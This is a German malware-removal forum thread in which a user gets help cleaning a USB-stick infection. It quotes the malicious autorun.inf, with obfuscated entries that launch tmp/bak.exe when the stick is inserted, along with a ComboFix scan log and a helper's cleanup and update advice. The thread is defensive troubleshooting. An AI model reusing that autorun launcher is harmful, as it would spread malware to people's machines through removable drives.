bak.exe (mit autorun auf usb-stick)

Attimus · 13.01.2010, 22:51

Hallo
Ich habe mir heute in der Schule was eingefangen:
auf dem stick ist eine "autorun.inf" mit folgendem inhalt:

Code:

ATTFilter

[autorun[
:9
[autorun
;jmp9
open=tmp/bak.exe
:cmp
icon=%SystemRoot%\system32\SHELL32.dll,4

action=Open folder*to view files using*Windows*Explorer

shell\\\open\\\\\comMand=tmp/bak.exe

Shell\\\\explore\\\command=tmp/bak.exe
useautoplay=1
;???ø?y
[0000000F9  5B 41 75 74 6F 52 75 6E-5D]
;Ê?n?d?C?dsÏ?eÀ??Âzò

;fdSfs¤"!fdsAfs

diese "bak.exe" wird von meinem Virenscanner (antivir) nicht als gefährlich eingestuft, auf virustotal.com aber folgendes ergebnis:
h**p://www.virustotal.com/de/analisis/53559506d85dcd831a76fcfcc68b2a102960da9797d01c16f9b724aaa08b2286-1263414048
ein freund hat mir daraufhin combofix empfohlen, das hab ich mal durchlaufen lassen, hier der log:

Code:

ATTFilter

ComboFix 10-01-13.06 - User 13.01.2010  21:02:13.1.2 - x86
Microsoft Windows XP Professional  5.1.2600.2.1252.43.1031.18.2047.1534 [GMT 1:00]
ausgeführt von:: c:\dokumente und einstellungen\User\Desktop\ComboFix.exe
AV: AntiVir Desktop *On-access scanning disabled* (Outdated) {AD166499-45F9-482A-A743-FDD3350758C7}
FW: ActiveArmor Firewall *disabled* {EDC10449-64D1-46c7-A59A-EC20D662F26D}
.

((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\dokumente und einstellungen\User\Anwendungsdaten\Desktopicon
c:\dokumente und einstellungen\User\Anwendungsdaten\Desktopicon\eBay.ico
c:\dokumente und einstellungen\User\Anwendungsdaten\Desktopicon\uninst.exe
c:\recycler\S-1-5-21-1270412988-3980248728-068360263-5068
c:\recycler\S-1-5-21-6368164752-8755239183-707246280-2096
c:\recycler\S-1-5-21-6368164752-8755239183-707246280-2096\Desktop.ini
c:\recycler\S-1-5-21-6368164752-8755239183-707246280-2096\mwau.exe
c:\windows\system32\twain_32.dll

.
(((((((((((((((((((((((   Dateien erstellt von 2009-12-13 bis 2010-01-13  ))))))))))))))))))))))))))))))
.

2010-01-13 19:40 . 2010-01-13 19:44	--------	d-----w-	c:\programme\Unlocker
2010-01-13 19:30 . 2010-01-13 19:30	1791	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\.purple\certificates\x509\tls_peers\bos.oscar.aol.com
2010-01-13 19:30 . 2010-01-13 19:30	1505	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\.purple\certificates\x509\tls_peers\slogin.oscar.aol.com
2010-01-13 17:22 . 2010-01-13 17:22	1691	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\.purple\certificates\x509\tls_peers\api.screenname.aol.com
2010-01-13 17:18 . 2010-01-13 17:18	--------	d-----w-	c:\programme\Pidgin
2010-01-10 13:03 . 2010-01-10 13:03	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Installer540
2010-01-10 13:00 . 2010-01-10 13:00	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Installer384
2010-01-10 12:46 . 2010-01-10 12:46	--------	d-----w-	c:\programme\Programmer's Notepad
2010-01-10 12:42 . 2010-01-10 12:42	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\FLEXnet
2010-01-10 12:35 . 2010-01-10 12:35	--------	d-----w-	c:\programme\Gemeinsame Dateien\Macrovision Shared
2010-01-10 12:16 . 2007-11-05 14:35	424	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\developer-tools@extensions.songbirdnest.com\chrome\dependencies\extensiondev\zip.bat
2010-01-10 12:16 . 2007-11-05 14:35	371	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\developer-tools@extensions.songbirdnest.com\chrome\dependencies\extensiondev\winrar.bat
2010-01-10 12:16 . 2007-11-05 14:35	364	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\developer-tools@extensions.songbirdnest.com\chrome\dependencies\extensiondev\wzcline.bat
2010-01-10 12:16 . 2007-11-05 14:35	339	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\developer-tools@extensions.songbirdnest.com\chrome\dependencies\extensiondev\winzip.bat
2010-01-10 12:16 . 2007-11-05 14:35	376	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\developer-tools@extensions.songbirdnest.com\chrome\dependencies\extensiondev\7zip.bat
2010-01-10 12:16 . 2007-11-05 14:35	340	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\developer-tools@extensions.songbirdnest.com\chrome\dependencies\extensiondev\cygzip.bat
2010-01-08 19:20 . 2010-01-08 19:20	--------	d-----w-	c:\windows\system32\LogFiles
2010-01-08 19:06 . 2010-01-10 12:46	--------	d-----w-	c:\programme\Notepad++
2010-01-08 19:06 . 2010-01-10 12:46	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Notepad++
2010-01-07 13:54 . 2008-03-21 12:57	14640	------w-	c:\windows\system32\spmsgXP_2k3.dll
2010-01-07 13:53 . 2009-09-09 17:24	62424	----a-w-	c:\windows\system32\drivers\xusb21.sys
2010-01-07 13:53 . 2009-08-13 21:40	1112288	----a-w-	c:\windows\system32\WdfCoInstaller01007.dll
2010-01-07 13:05 . 2010-01-07 13:05	--------	d-----w-	c:\programme\XBCD
2010-01-06 22:42 . 2010-01-06 22:42	--------	d-----w-	c:\programme\FreeTime
2010-01-06 22:35 . 2010-01-07 14:24	--------	d-----w-	c:\programme\mp4UI
2010-01-06 14:03 . 2010-01-06 14:03	--------	d-----w-	c:\programme\BRL-CAD
2010-01-06 13:43 . 2010-01-06 13:43	--------	d-----w-	c:\programme\Xming
2010-01-06 13:36 . 2010-01-06 13:36	--------	d-----w-	c:\programme\IrfanView
2010-01-04 12:27 . 2010-01-04 12:27	11264	----a-r-	c:\dokumente und einstellungen\User\Anwendungsdaten\Microsoft\Installer\{98613C99-1399-416C-A07C-1EE1C585D872}\Icon98613C992.exe
2010-01-04 12:27 . 2010-01-04 12:27	--------	d-----w-	c:\programme\Seagate
2010-01-03 18:30 . 2010-01-03 18:30	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Help
2010-01-03 16:08 . 2010-01-03 16:08	--------	d-----w-	c:\programme\Creative
2009-12-30 14:58 . 2009-12-30 14:58	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\DivX
2009-12-30 11:10 . 2009-12-30 11:10	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Echo Software
2009-12-27 10:37 . 2009-12-27 10:37	--------	d-----w-	c:\programme\WinSCP
2009-12-27 09:39 . 2009-12-27 09:47	--------	d-----w-	c:\programme\BrAutomation
2009-12-26 23:31 . 2009-12-26 23:31	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Canneverbe_Limited
2009-12-26 23:31 . 2009-12-26 23:31	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\Canneverbe Limited
2009-12-26 23:31 . 2009-12-26 23:31	--------	d-----w-	c:\programme\CDBurnerXP
2009-12-26 23:31 . 2009-09-28 19:57	7168	----a-w-	c:\windows\system32\drivers\StarOpen.sys
2009-12-25 20:17 . 2009-12-25 20:17	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\LolClient.F24C99354F615F3BAB18AE7B93E3F9B9E8784FA6.1
2009-12-25 16:08 . 2009-12-25 16:09	38784	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Macromedia\Flash Player\www.macromedia.com\bin\airappinstaller\airappinstaller.exe
2009-12-25 16:08 . 2009-12-25 16:09	38784	----a-w-	c:\dokumente und einstellungen\Default User\Anwendungsdaten\Macromedia\Flash Player\www.macromedia.com\bin\airappinstaller\airappinstaller.exe
2009-12-25 16:08 . 2009-12-25 16:10	--------	d-----w-	c:\programme\Gemeinsame Dateien\Adobe AIR
2009-12-25 15:41 . 2010-01-09 15:01	--------	d-----w-	c:\programme\EAGLE-4.16r2
2009-12-25 15:40 . 1996-11-06 11:05	302592	----a-w-	c:\windows\unin0407.exe
2009-12-25 15:38 . 1997-04-08 19:08	299520	----a-w-	c:\windows\uninst.exe
2009-12-25 15:38 . 2009-12-25 15:38	--------	d-----w-	c:\dokumente und einstellungen\User\WINDOWS
2009-12-25 15:34 . 2010-01-06 21:43	--------	d-----w-	c:\programme\SharePod
2009-12-24 22:34 . 2009-12-24 22:34	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Blizzard Entertainment
2009-12-23 19:39 . 2009-11-14 00:49	120056	------w-	c:\windows\system32\pxcpyi64.exe
2009-12-23 19:39 . 2009-11-14 00:49	118520	------w-	c:\windows\system32\pxinsi64.exe
2009-12-23 19:34 . 2009-12-23 19:41	--------	d-----w-	c:\programme\Gemeinsame Dateien\DivX Shared
2009-12-23 19:34 . 2009-12-23 19:41	--------	d-----w-	c:\programme\DivX
2009-12-23 13:15 . 2009-12-23 13:15	--------	d-----w-	c:\programme\LTC
2009-12-23 12:52 . 2004-03-22 04:17	25840	----a-w-	c:\windows\system32\Spool\prtprocs\w32x86\mdippr.dll
2009-12-23 12:52 . 2004-03-22 04:17	24816	----a-w-	c:\windows\system32\mdimon.dll
2009-12-23 12:52 . 2009-12-23 12:52	--------	d-----w-	c:\windows\SHELLNEW
2009-12-23 12:52 . 2009-12-23 12:52	--------	d-----w-	c:\programme\Microsoft.NET
2009-12-23 12:01 . 2009-12-27 09:35	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\dvdcss
2009-12-22 19:13 . 2009-05-03 23:23	177664	----a-w-	c:\windows\system32\unrar.dll
2009-12-22 19:13 . 2009-12-22 19:13	--------	d-----w-	c:\programme\Unrar Extract and Recover
2009-12-22 18:49 . 2009-12-22 18:49	--------	d-----w-	c:\programme\Intelore
2009-12-22 18:41 . 2009-12-22 18:41	--------	d-----w-	c:\programme\Youtube Downloader HD
2009-12-21 20:00 . 2010-01-06 23:08	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\vlc
2009-12-21 19:59 . 2009-12-21 19:59	--------	d-----w-	c:\programme\VideoLAN
2009-12-21 08:02 . 2009-12-21 08:14	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\Blizzard Entertainment
2009-12-20 16:41 . 2009-12-20 16:41	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\Blizzard
2009-12-20 16:37 . 2009-12-20 22:44	--------	d-----w-	c:\programme\Gemeinsame Dateien\Blizzard Entertainment
2009-12-20 15:20 . 2004-08-03 22:08	26496	-c--a-w-	c:\windows\system32\dllcache\usbstor.sys
2009-12-20 15:19 . 2009-06-16 02:08	569344	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\mtp@songbirdnest.com\components\sbMTPWin32.dll
2009-12-20 15:19 . 2009-06-16 02:08	270336	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\windowsmedia@songbirdnest.com\platform\WINNT_x86-msvc\components\sbWindowsMediacore.dll
2009-12-20 15:19 . 2009-06-16 02:08	106496	----a-w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2\Profiles\hr7w0xgm.default\extensions\quicktime@songbirdnest.com\platform\WINNT_x86-msvc\components\sbQuickTimeMediacore.dll
2009-12-20 15:17 . 2009-12-20 15:17	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Songbird2
2009-12-20 15:17 . 2009-12-20 15:17	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Songbird2
2009-12-20 15:17 . 2010-01-13 19:43	--------	d-----w-	c:\programme\Songbird
2009-12-19 18:58 . 2009-12-19 18:58	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\SharePod
2009-12-19 18:36 . 2009-12-19 18:37	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Apple Computer
2009-12-19 18:36 . 2009-12-19 18:36	--------	d-----w-	c:\programme\Bonjour
2009-12-19 18:36 . 2009-12-19 18:36	--------	d-----w-	c:\programme\QuickTime
2009-12-19 18:36 . 2009-12-19 18:36	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\Apple Computer
2009-12-19 18:36 . 2009-12-19 18:36	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Apple
2009-12-19 18:36 . 2009-12-19 18:36	--------	d-----w-	c:\programme\Apple Software Update
2009-12-19 18:36 . 2010-01-07 13:53	--------	dc----w-	c:\windows\system32\DRVSTORE
2009-12-19 18:36 . 2008-09-10 15:45	32000	----a-w-	c:\windows\system32\drivers\usbaapl.sys
2009-12-19 18:35 . 2009-12-19 18:36	--------	d-----w-	c:\programme\Gemeinsame Dateien\Apple
2009-12-19 18:35 . 2009-12-19 18:35	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\Apple
2009-12-19 18:35 . 2009-12-19 18:36	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Apple Computer
2009-12-19 17:58 . 2009-12-19 17:58	--------	d-----w-	c:\programme\WindSolutions
2009-12-19 17:58 . 2009-12-19 17:59	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\WindSolutions
2009-12-19 17:58 . 2009-12-19 17:58	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\WindSolutions
2009-12-19 12:03 . 2004-08-03 23:57	159232	----a-w-	c:\windows\system32\ptpusd.dll
2009-12-19 12:03 . 2001-08-18 03:54	5632	----a-w-	c:\windows\system32\ptpusb.dll
2009-12-19 12:03 . 2004-08-03 21:58	15104	-c--a-w-	c:\windows\system32\dllcache\usbscan.sys
2009-12-19 12:03 . 2004-08-03 21:58	15104	----a-w-	c:\windows\system32\drivers\usbscan.sys
2009-12-18 19:12 . 2009-11-25 10:19	56816	----a-w-	c:\windows\system32\drivers\avgntflt.sys
2009-12-18 19:12 . 2009-03-30 08:33	96104	----a-w-	c:\windows\system32\drivers\avipbb.sys
2009-12-18 19:12 . 2009-02-13 10:29	22360	----a-w-	c:\windows\system32\drivers\avgntmgr.sys
2009-12-18 19:12 . 2009-02-13 10:17	45416	----a-w-	c:\windows\system32\drivers\avgntdd.sys
2009-12-18 19:12 . 2009-12-18 19:12	--------	d-----w-	c:\programme\Avira
2009-12-18 19:12 . 2009-12-18 19:12	--------	d-----w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\Avira
2009-12-18 19:11 . 2009-12-18 19:11	--------	d-----w-	c:\programme\Gemeinsame Dateien\DirectX
2009-12-18 13:49 . 2010-01-10 12:44	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Adobe
2009-12-18 13:42 . 2010-01-10 12:39	--------	d-----w-	c:\programme\Gemeinsame Dateien\Adobe
2009-12-18 13:40 . 2010-01-10 00:54	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\gtk-2.0
2009-12-18 13:32 . 2009-12-18 13:32	--------	d-----w-	c:\programme\Guitar Pro 5
2009-12-17 22:00 . 2006-11-29 12:06	3426072	----a-w-	c:\windows\system32\d3dx9_32.dll
2009-12-17 22:00 . 2006-09-28 15:05	2414360	----a-w-	c:\windows\system32\d3dx9_31.dll
2009-12-17 22:00 . 2009-12-17 22:00	--------	d-----w-	c:\windows\Logs
2009-12-17 21:27 . 2010-01-13 20:03	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\.purple
2009-12-17 21:27 . 2009-12-17 21:27	--------	d-----w-	c:\programme\Gemeinsame Dateien\GTK
2009-12-17 16:34 . 2010-01-04 12:26	--------	d-----w-	c:\programme\Gemeinsame Dateien\Wise Installation Wizard
2009-12-17 16:28 . 2009-12-17 16:28	--------	d-----w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\Opera
2009-12-17 16:27 . 2009-12-17 16:27	--------	d-----w-	c:\programme\Opera
2009-12-17 15:20 . 2009-12-17 15:20	--------	d-----w-	c:\windows\system32\Lang
2009-12-17 15:18 . 2009-12-17 15:18	--------	d-----w-	c:\windows\system32\RTCOM
2009-12-17 15:17 . 2009-12-17 16:34	--------	d-----w-	c:\programme\NVIDIA Corporation
2009-12-17 15:16 . 2005-09-28 10:10	466944	----a-w-	c:\windows\system32\CapabilityTable.exe
2009-12-17 15:16 . 2006-04-14 06:00	208896	------w-	c:\windows\system32\nvuide.exe
2009-12-17 15:16 . 2006-04-14 06:00	208896	----a-w-	c:\windows\system32\nvunrm.exe
2009-12-17 15:16 . 2006-02-17 03:28	101632	----a-w-	c:\windows\system32\drivers\nvtcp.sys
2009-12-17 15:16 . 2006-04-14 06:00	208896	----a-w-	c:\windows\system32\nvusmb.exe

.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-01-10 12:44 . 2009-12-17 12:45	18728	----a-w-	c:\dokumente und einstellungen\User\Lokale Einstellungen\Anwendungsdaten\GDIPFONTCACHEV1.DAT
2010-01-07 13:54 . 2010-01-07 13:54	0	---ha-w-	c:\windows\system32\drivers\Msft_Kernel_xusb21_01007.Wdf
2010-01-07 13:54 . 2010-01-07 13:54	0	---ha-w-	c:\windows\system32\drivers\MsftWdf_Kernel_01007_Coinstaller_Critical.Wdf
2010-01-03 16:09 . 2009-12-17 15:18	--------	d--h--w-	c:\programme\InstallShield Installation Information
2009-12-23 12:57 . 2009-12-23 12:57	--------	d--h--w-	c:\dokumente und einstellungen\All Users\Anwendungsdaten\CanonBJ
2009-12-19 18:57 . 2001-08-18 12:00	70580	----a-w-	c:\windows\system32\perfc007.dat
2009-12-19 18:57 . 2001-08-18 12:00	405118	----a-w-	c:\windows\system32\perfh007.dat
2009-12-19 12:03 . 2009-12-17 21:59	--------	d-----w-	c:\dokumente und einstellungen\User\Anwendungsdaten\Winamp
2009-12-17 22:02 . 2009-12-17 21:59	--------	d-----w-	c:\programme\Winamp
2009-12-17 21:59 . 2009-12-17 21:59	--------	d-----w-	c:\programme\Winamp Detect
2009-11-20 19:32 . 2009-11-20 19:32	278120	----a-w-	c:\windows\system32\nvmccs.dll
2009-11-19 20:42 . 2009-12-17 15:15	592488	----a-w-	c:\windows\system32\NVUNINST.EXE
2009-11-14 00:47 . 2009-11-14 00:47	90112	----a-w-	c:\windows\system32\dpl100.dll
2009-11-14 00:47 . 2009-11-14 00:47	856064	----a-w-	c:\windows\system32\divx_xx0c.dll
2009-11-14 00:47 . 2009-11-14 00:47	856064	----a-w-	c:\windows\system32\divx_xx07.dll
2009-11-14 00:47 . 2009-11-14 00:47	847872	----a-w-	c:\windows\system32\divx_xx0a.dll
2009-11-14 00:47 . 2009-11-14 00:47	843776	----a-w-	c:\windows\system32\divx_xx16.dll
2009-11-14 00:47 . 2009-11-14 00:47	839680	----a-w-	c:\windows\system32\divx_xx11.dll
2009-11-14 00:47 . 2009-11-14 00:47	696320	----a-w-	c:\windows\system32\DivX.dll
2009-11-03 11:39 . 2009-12-17 15:18	5940736	----a-w-	c:\windows\system32\drivers\RtkHDAud.sys
2009-11-02 10:53 . 2009-12-17 15:18	18782720	----a-w-	c:\windows\RTHDCPL.EXE
2009-11-02 05:48 . 2009-12-17 15:18	831488	----a-w-	c:\windows\RtlExUpd.dll
2009-10-23 10:53 . 2009-12-17 15:18	41984	----a-w-	c:\windows\system32\RtkCoInstXP.dll
.

((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WiseStubReboot"="MSIEXEC" [X]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nTrayFw"="c:\programme\NVIDIA Corporation\NetworkAccessManager\bin\nTrayFw.exe" [2006-02-17 270336]
"RTHDCPL"="RTHDCPL.EXE" [2009-11-02 18782720]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2009-11-20 110184]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2009-11-20 12669544]
"WinampAgent"="c:\programme\Winamp\winampa.exe" [2009-12-16 39424]
"Adobe Reader Speed Launcher"="c:\programme\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-10-03 35696]
"Adobe ARM"="c:\programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe" [2009-09-04 935288]
"avgnt"="c:\programme\Avira\AntiVir Desktop\avgnt.exe" [2009-03-02 209153]
"QuickTime Task"="c:\programme\QuickTime\QTTask.exe" [2008-09-06 413696]
"UnlockerAssistant"="c:\programme\Unlocker\UnlockerAssistant.exe" [2009-10-26 15872]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2004-08-03 15360]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"wscsvc"=2 (0x2)
"UPS"=3 (0x3)
"helpsvc"=2 (0x2)
"ERSvc"=2 (0x2)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Programme\\NVIDIA Corporation\\NetworkAccessManager\\Apache Group\\Apache2\\bin\\Apache.exe"=
"c:\\Programme\\Opera\\opera.exe"=
"c:\\Programme\\Bonjour\\mDNSResponder.exe"=
"d:\\Games\\LoL\\Riot Games\\League of Legends\\air\\LolClient.exe"=
"d:\\Games\\LoL\\Riot Games\\League of Legends\\game\\League of Legends.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"8370:TCP"= 8370:TCP:League of Legends Launcher
"8370:UDP"= 8370:UDP:League of Legends Launcher

R2 AntiVirSchedulerService;Avira AntiVir Planer;c:\programme\Avira\AntiVir Desktop\sched.exe [18.12.2009 20:12 108289]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [17.12.2009 16:18 1684736]
.
.
------- Zusätzlicher Suchlauf -------
.
uInternet Settings,ProxyOverride = *.local
IE: Nach Microsoft &Excel exportieren - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
LSP: %SYSTEMROOT%\system32\nvappfilter.dll
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -

HKLM-Run-nwiz - nwiz.exe
AddRemove-eBay Icon - c:\dokumente und einstellungen\User\Anwendungsdaten\Desktopicon\uninst.exe



**************************************************************************
Scanne versteckte Prozesse... 

Scanne versteckte Autostarteinträge... 

Scanne versteckte Dateien... 

Scan erfolgreich abgeschlossen
versteckte Dateien: 

**************************************************************************
.
--------------------- Durch laufende Prozesse gestartete DLLs ---------------------

- - - - - - - > 'winlogon.exe'(736)
c:\windows\system32\cscui.dll

- - - - - - - > 'lsass.exe'(796)
c:\windows\system32\nvappfilter.dll

- - - - - - - > 'explorer.exe'(3144)
c:\windows\system32\msi.dll
.
------------------------ Weitere laufende Prozesse ------------------------
.
c:\windows\system32\nvsvc32.exe
c:\programme\Avira\AntiVir Desktop\avguard.exe
c:\programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
c:\programme\Bonjour\mDNSResponder.exe
c:\programme\NVIDIA Corporation\NetworkAccessManager\Apache Group\Apache2\bin\apache.exe
c:\programme\CDBurnerXP\NMSAccessU.exe
c:\programme\NVIDIA Corporation\NetworkAccessManager\bin\nSvcIp.exe
c:\programme\NVIDIA Corporation\NetworkAccessManager\bin\nSvcLog.exe
c:\programme\NVIDIA Corporation\NetworkAccessManager\Apache Group\Apache2\bin\apache.exe
c:\windows\system32\wdfmgr.exe
c:\programme\NVIDIA Corporation\NetworkAccessManager\bin\nSvcAppFlt.exe
c:\windows\RTHDCPL.EXE
c:\windows\system32\wscntfy.exe
c:\windows\system32\imapi.exe
.
**************************************************************************
.
Zeit der Fertigstellung: 2010-01-13  21:07:02 - PC wurde neu gestartet
ComboFix-quarantined-files.txt  2010-01-13 20:07

Vor Suchlauf: 5 Verzeichnis(se), 42.713.550.848 Bytes frei
Nach Suchlauf: 6 Verzeichnis(se), 45.298.507.776 Bytes frei

WindowsXP-KB310994-SP2-Pro-BootDisk-DEU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect /noguiboot

- - End Of File - - C3726FBFA123A337BA88B5023D3C0BC1

ich hoffe ihr könnt mir helfen

cosinus · 14.01.2010, 10:09

Hallo und

Ein Grund warum ich auf meinen Rechnern nur mit eingeschränkten Rechten arbeite und auf jedem Laufwerk diesen bescheuerten Autostart abdrehe

CF ist eigentlich nur auf explizite Anweisung hin auszuführen. Bitte nun diese Liste beachten und abarbeiten. Beim Scan mit MalwareBytes auch alle externen Speicher (ext. Platten, USB-Sticks, ... mit anklemmen!! )

Wichtig für Benutzer mit Windows Vista und Windows 7: Bitte alle Tools per Rechtsklick => Als Admin ausführen!

Die Logfiles kannst Du zB alle in eine Datei zippen und auf File-Upload.net hochladen und hier verlinken, denn 1. sind manche Logfiles fürs Board nämlich zu groß und 2. kann ich mit einem Klick mir gleich alle auf einmal runterladen.

Attimus · 14.01.2010, 17:40

hi, hab alles abgearbeitet

combofix hat mir ja ein freund geraten... hier sind die ganzen logs:
logs.rar

cosinus · 14.01.2010, 20:26

Die Logs sehen sowit ok aus. Hast Du die autorun.inf und die schädliche Datei gelöscht, die automatisch aufgerufen werden soll wenn der Stick eingesteckt wird? Ist diese bak.exe im x:\tmp (x steht für für den Buchstaben Deinen Sticks)

Du hast auch nur das SP2 und IE6 drauf, unbedingt updaten!!!

Windows-/Internet Explorer Update
Besuch mit dem IE die MS-Updateseite und lass Dir alle wichtigen Updates installieren. Vista-User: Anleitung Windows-Update
Es geht v.a. ums SP3 und den IE8, auch wenn Du ihn nicht nutzt.

Adobe Acrobat Reader aktualisieren
Dein Adobe Reader ist nicht aktuell, was ein großes Sicherheitsrisiko darstellt. Wir empfehlen daher, die alte Version über Systemsteuerung => Software zu deinstallieren, indem Du dort auf "Adobe Reader x.0" klickst und das Programm entfernst. Starte den Rechner neu und downloade den aktuellen Acrobat-Reader herunter und installiere ihn.

Falls Dir der Adobe Acrobat Reader nicht gefällt, kannst Du alternativ auch Foxit PDF Reader installieren. Er ist "schlanker" und benutzt weniger Resourcen.

Auch auf einen aktuellen Flashplayer achten!!

Java-Update
Veraltete Java-Installationen sind ein Sicherheitsrisiko, daher solltest Du die alten Versionen löschen (falls vorhanden) und auf die neuste aktualisieren. Beende dazu alle Programme (v.a. die Browser), klick danach auf Start, Systemsteuerung, Software und deinstalliere darüber alle aufgelisteten Java-Versionen. Lad Dir danach von hier das aktuelle Java SE Runtime Environment (JRE) herunter und installiere es.

Attimus · 14.01.2010, 21:02

danke! hat geklappt

vom system ist der übeltäter runter, vom usb-stick hab ich die dateien (3stück) mit linux gelöscht (vorher waren die files nach jedem löschen wieder da)

zu den sicherheitslücken: das system is noch nicht lange installiert und teilt sich die platte mit fedora (linux) und da ich sowieso am umsteigen bin hab ichs mit der pflege von windows nicht mehr so ernst genommen, weil ichs ja nurmehr für sachen brauche die unter linux nicht laufen.
wenn sich der virus noch länger geziert hätte, dann hätt ich auch einfach neu aufgesetzt...
aber jezt ist er ja weg

großes

mfg Simon

bak.exe (mit autorun auf usb-stick)

Plagegeister aller Art und deren Bekämpfung: bak.exe (mit autorun auf usb-stick)